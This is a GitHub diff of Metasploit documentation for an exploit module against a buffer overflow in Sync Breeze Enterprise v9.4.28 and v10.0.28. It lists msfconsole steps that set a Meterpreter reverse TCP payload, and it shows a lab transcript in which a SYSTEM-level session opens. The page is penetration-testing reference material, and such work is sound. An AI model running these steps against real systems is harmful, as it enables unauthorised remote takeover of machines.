You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
Copy file name to clipboardExpand all lines: documentation/modules/exploit/windows/http/syncbreeze_bof.md
+40-8Lines changed: 40 additions & 8 deletions
Display the source diff
Display the rich diff
Original file line number
Diff line number
Diff line change
@@ -1,6 +1,6 @@
1
1
## Vulnerable Application
2
2
3
-
[Sync Breeze Enterprise](http://www.syncbreeze.com) versions up to v9.4.28 are affected by a stack-based buffer overflow vulnerability which can be leveraged by an attacker to execute arbitrary code in the context of NT AUTHORITY\SYSTEM on the target. The vulnerability is caused by improper bounds checking of the request path in HTTP GET requests sent to the built-in web server. This module has been tested successfully on Windows 7 SP1. The vulnerable application is available for download at [Sync Breeze Enterprise](http://www.syncbreeze.com/setups/syncbreezeent_setup_v9.4.28.exe).
3
+
[Sync Breeze Enterprise](http://www.syncbreeze.com) versions up to v9.4.28 and v10.0.28 are affected by a stack-based buffer overflow vulnerability which can be leveraged by an attacker to execute arbitrary code in the context of NT AUTHORITY\SYSTEM on the target. The vulnerabilities are caused by improper bounds checking of the request path in HTTP GET requests and username value via HTTP POST requests sent to the built-in web server, respectively. This module has been tested successfully on Windows 7 SP1. The vulnerable applications are available for download at [Sync Breeze Enterprise v9.4.28](http://www.syncbreeze.com/setups/syncbreezeent_setup_v9.4.28.exe) and [Sync Breeze Enterprise v10.0.28](http://www.syncbreeze.com/setups/syncbreezeent_setup_v10.0.28.exe).
4
4
5
5
## Verification Steps
6
6
1. Install a vulnerable Sync Breeze Enterprise
@@ -10,13 +10,14 @@
10
10
5. Check `Enable Web Server On Port 80` to start the web interface
11
11
6. Start `msfconsole`
12
12
7. Do `use exploit/windows/http/syncbreeze_bof`
13
-
8. Do `set RHOST ip`
14
-
9. Do `check`
15
-
10. Verify the target is vulnerable
16
-
11. Do `set PAYLOAD windows/meterpreter/reverse_tcp`
17
-
12. Do `set LHOST ip`
18
-
13. Do `exploit`
19
-
14. Verify the Meterpreter session is opened
13
+
8. Select appropriate target via `set target 0` or `set target 1`
14
+
9. Do `set RHOST ip`
15
+
10. Do `check`
16
+
11. Verify the target is vulnerable
17
+
12. Do `set PAYLOAD windows/meterpreter/reverse_tcp`
18
+
13. Do `set LHOST ip`
19
+
14. Do `exploit`
20
+
15. Verify the Meterpreter session is opened
20
21
21
22
## Scenarios
22
23
@@ -72,3 +73,34 @@ Logged On Users : 3
72
73
Meterpreter : x86/windows
73
74
meterpreter >
74
75
```
76
+
77
+
###Sync Breeze Enterprise v10.0.28 on Windows 7 SP1
78
+
79
+
```
80
+
msf > use exploit/windows/http/syncbreeze_bof
81
+
msf exploit(syncbreeze_bof) > set rhost 192.168.10.61
82
+
rhost => 192.168.10.61
83
+
msf exploit(syncbreeze_bof) > set target 1
84
+
target => 1
85
+
msf exploit(syncbreeze_bof) > exploit
86
+
87
+
[*] Started reverse TCP handler on 192.168.10.60:4444
88
+
[*] Sending request...
89
+
[*] Sending stage (171583 bytes) to 192.168.10.61
90
+
[*] Meterpreter session 1 opened (192.168.10.60:4444 -> 192.168.10.61:4129) at 2017-10-09 13:22:15 -0400
0 commit comments